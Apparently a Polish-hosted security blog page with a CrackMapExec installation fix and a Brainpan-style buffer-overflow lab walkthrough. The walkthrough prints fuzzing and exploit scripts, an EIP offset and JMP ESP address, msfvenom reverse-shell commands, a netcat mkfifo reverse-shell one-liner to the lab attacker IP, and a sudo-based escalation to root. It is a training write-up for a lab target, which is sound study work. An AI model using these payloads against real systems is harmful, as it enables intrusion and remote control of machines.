Kategorie
Bez kategorii

Solving CrackMapExec ver 5.0.2dev installation error related to asn1crypto

Solving CrackMapExec ver 5.0.2dev installation error related to asn1crypto

Below you will find a solution to the installation issue of CrackMapExec 5.0.2dev (CME), related to past versions of asn1crypto (< 1.3.0). It occured on a Kali Linux 2020.1 VM, while following along with the instructions from Github source (link below).

https://github.com/byt3bl33d3r/CrackMapExec/wiki/Installation#debianubuntu

Steps to reproduce the behavior:

#~ apt-get install -y libssl-dev libffi-dev python-dev build-essential
#~ git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
#~ cd CrackMapExec
#~ python3 setup.py install

error: asn1crypto>=1.3.0 is required by {‚minikerberos’}:

Installed /usr/local/lib/python3.7/dist-packages/crackmapexec-5.0.2.dev0-py3.7.egg
Processing dependencies for crackmapexec==5.0.2.dev0
error: asn1crypto 0.24.0 is installed but asn1crypto>=1.3.0 is required by {'minikerberos'}

Now as we know the cause, all we need to do is

How can we solve it?

To upgrade the asn1crypto library, ensure you’ve already installed pip3 via your system package manager:

#~ apt update
#~ apt install python3-pip

then follow the set of commands visible below:

#~ pip3 install asn1crypto==1.3.0
#~ pip3 install asn1crypto --upgrade --user

and:

#~ pip3 install prompt-toolkit==2.0.9

After a successful upgrade procedure, once again repeat this in the CrackMapExec directory:

root@kali:/home/kali/CrackMapExec# python3 setup.py install

Now that you’ve got the CME tool installed, you can use it to enumerate the network of live Windows hosts.

References

Kategorie
Bez kategorii

Mr Robot

Kategorie
Bez kategorii

OSCP-like Buffer Overflow

1.Initial Scan

Following is the outcome of my hacking handiwork and obtaining root. Withour further delay, let’s start the party.

nmap -sV -sT -v -p- -T4 192.168.56.1/24
  • custom application running in Wine on port 9999
  • python SimpleHTTPServer on port 10000

Nikto might be helpful at this moment

nikto -h 192.168.56.106

It tells us about the mysterious bin directory. Let’s browse the website and look inside it:

192.168.56.106:10000/bin/

A suspicious app binary is waiting there for us – maybe it’s the key for solving this puzzle?

We won’t know unless we check it out. Let’s run the strings command to view the hardcoded strings within the binary

The shitstorm line instantly draws the attention – it may be a password to a certain service! We are gonna give it a try:

It looks useless. I also used telnet but still nothing, the application responded with the following: Connection closed by foreign host.

The app behaves as if it were a kind of a server. After opening the socket it waits for connection, checks the input and then drops.

2. Some scripting & fuzzing

Preinstalled Immunity Debugger on Windows 32-bit VM may come in handy here.

In the first round we’re gonna send a long, repeated string of A’s with a simple fuzzer visible below. By running the script, the terminal will tell us whether providing sufficiently long input can crash the app:

import socket

for i in range(30):
  s = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
  s.connect(("192.168.56.105",9999) # mind to change the IP address :-)
  payloaod = int(i)*("A"*100)
  s.send(payload+"\r\n")
  print "[*] Sending buffer data with " + str(len(str(payload))) + " A's\r\n"
  s.close()

Running the code provides us with the following output:

Turns out that the overflow occurs around the length of 900 A’s.

In Immunity we notice that the EIP has been overwritten with 41414141 (ASCII representation of four A’s). It also says that an Access violation occurs while executing the code at address 41414141.

3. Finding EIP location

As the vulnerability is known and it’s obvious that we’ve gained control over replacing the EIP address, it brings us closer to our goal.

Firstly, we need to find the offset that could control the EIP. We’re gonna utilize a Metasploit feature and create a pattern consisting of a set of unique, three-character substrings:

It spits out a unique and random set that perfectly fits to our payload.

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.105',9999))

payload = ("Put the pattern here")

print s.recv(1024)
s.send(payload)
print s.recv(1024)

s.close()

Execution of the script causes Access violation again and leads to crash:

As you can see above, the pattern inside the EIP is 35724134

After having the pattern located inside the instruction pointer (EIP), let’s determine the offset (known as the exact location of the address) and make it point to our malicious shellcode, which we will craft later on.

ruby pattern_offset.rb -q 35724134

Exactly 524 bytes of junk data is needed to get us to the EIP.

Now our payload will look like this: "A"*524+"B"*4+"C"*(900-524-4)

import socket

s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.168.56.105',9999))

payload = "A"*524 + "B"*4 + "C"*(900-524-4)

print s.recv(1024)
s.send(payload+"\r\n")
print s.recv(1024)

s.close()

After executing this script the EIP gets overwritten with 42424242 (the ASCII code of „B” is 0x42)

Setting JMP ESP address

!mona jump -r ESP

Quick glance and we see something helpful:

0x31170000<- module with no SafeSEH and ASLR protection

And we find the JMP ESP address

4. Shellcode payload and reverse shell

  • Brainpan’s IP – 192.168.56.106
  • Attacker’s IP – 192.168.56.101
  • Windows IP – 192.168.56.105
msfvenom -p windows/shell_reverse_tcp lhost=192.168.56.101 lport=4444 -f c -b "\x00"
import socket

buf = ("\xb8\xf9\...\...\...\..."
"\xc9\xb1\...\..\...\...\...\..."
"...
"...
...
"\x..\x..\x..\x..") 

payload = "A"*524 + "\xf3\x12\x17\x31" + "\x90"*16 + buf
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
  s.connect(('192.168.56.106',9999))
except:
  print "Error"
  sys.exit(0)

s.recv(1024)
s.send(payload)

It was really confusing at first. Notice the CMD 1.4.1 label? This is because the windows executable is running through Wine on a Linux machine. Time to switch to Linux shell.

msfvenom -p linux/x86/exec CMD="mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.101 4444 >/tmp/f" -b "\x00" -f py

…and swap the shellcode in our python script after setting up the netcat once again.

5. Privilege escalation

Good, we’re back in the game! Spawning a tty shell -> check id -> list the directory ls -la -> cat checksrv.sh -> and check the local users

cat group

cat passwd -> ls -> cd /opt -> cd /etc

ls -la sudoers

sudo /home/anansi/bin/anasi_util

sudo /home/anansi/bin/anasi_util manual /etc/sudoers

!/bin/bash And finally!

Conclusion

It is a great opportunity to improve:

  • understanding of buffer overflow,
  • scripting skills,
  • fundamentals of Immunity Debugger,

Hope it was useful 🙂